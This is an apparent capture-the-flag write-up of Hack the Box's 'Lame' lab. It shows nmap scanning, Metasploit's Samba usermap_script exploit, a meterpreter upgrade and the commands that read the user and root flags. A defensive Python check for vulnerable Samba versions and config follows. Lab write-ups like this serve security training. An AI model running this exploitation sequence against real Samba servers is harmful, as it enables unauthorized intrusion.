Hello friends!! Today we are going to solve another CTF challenge, “Lame”, a lab presented by Hack the Box for online penetration testing practice according to your experience level. They have a collection of vulnerable labs as challenges, from beginner to expert level. HTB labs are split into two groups, Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Lame lab.
Level: Beginners
Task: find user.txt and root.txt file in victim’s machine.
Let’s begin the Game!!
Since these labs are available online, they have static IPs; the IP of Lame is 10.10.10.3, so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.3
From the image below, you can observe that we found many open ports, such as 21 for FTP, 22 for SSH, and 139 and 445 for the Samba service, and also got a hint that the OS platform can be Unix or Linux.
Gratefully, Google gave me a hint in its 2nd link, which was from Exploit-DB.
Then I ran the msfconsole command in the terminal to load the Metasploit framework and use the Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module to exploit the target machine.
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploit
Terrific!! I have got unauthorized access to the victim’s command shell through session 1, as shown in the image below.
I upgraded the command shell to a meterpreter shell by executing the following command.
sessions -u 1
Inside the path /home/makis I found the user.txt file and used the cat “file name” command to read it.
cd home
ls
cd makis
ls
cat user.txt
Great!! We got our 1st flag successfully.
Inside the path /root I found the root.txt file and used the cat “file name” command to read it.
cd root
ls
cat root.txt
Great!! We got our 2nd flag successfully.
It will be a very stress-free challenge for those candidates who have a little knowledge of vulnerability analysis.
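For the defensive side of that vulnerability analysis, here is an added Python check (not part of the original write-up or of the Metasploit module) that tells an administrator whether a Samba host falls in the version range named in the module title and has the "username map script" option set in smb.conf. The function names, the sample config, the script path, and treating both ends of the range as inclusive are assumptions of this example.

```python
import re

# Range from the module title on this page; inclusive ends are an assumption.
LOW, HIGH = "3.0.20", "3.0.25rc3"
FINAL = 10**6  # sorts a final release after any of its rc builds
# Constructed sample config, not taken from the lab machine.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

def parse_version(text):
    """'3.0.25rc3' -> (3, 0, 25, 3); '3.0.25' -> (3, 0, 25, FINAL)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else FINAL)

def in_module_range(version):
    return parse_version(LOW) <= parse_version(version) <= parse_version(HIGH)

def username_map_script(smb_conf):
    """Return the [global] value of 'username map script', or None if unset."""
    # Lines before any section header are counted as global here (conservative).
    section, value = "global", None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, _, val = line.partition("=")
            # smb.conf parameter names ignore case and embedded whitespace
            if re.sub(r"\s+", "", key).lower() == "usernamemapscript":
                value = val.strip() or None
    return value

def audit(version, smb_conf):
    if not in_module_range(version):
        return f"OK: {version} is outside {LOW} - {HIGH}"
    script = username_map_script(smb_conf)
    if script:
        return f"EXPOSED: {version} with username map script = {script}"
    return f"REVIEW: {version} is in range, option not set; upgrade Samba"

if __name__ == "__main__":
    print(audit("3.0.20", SAMPLE_CONF))
```

Run it against the output of `smbd --version` and the contents of the host's own smb.conf; an EXPOSED result means the option should be removed and Samba upgraded.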
Happy Hacking!!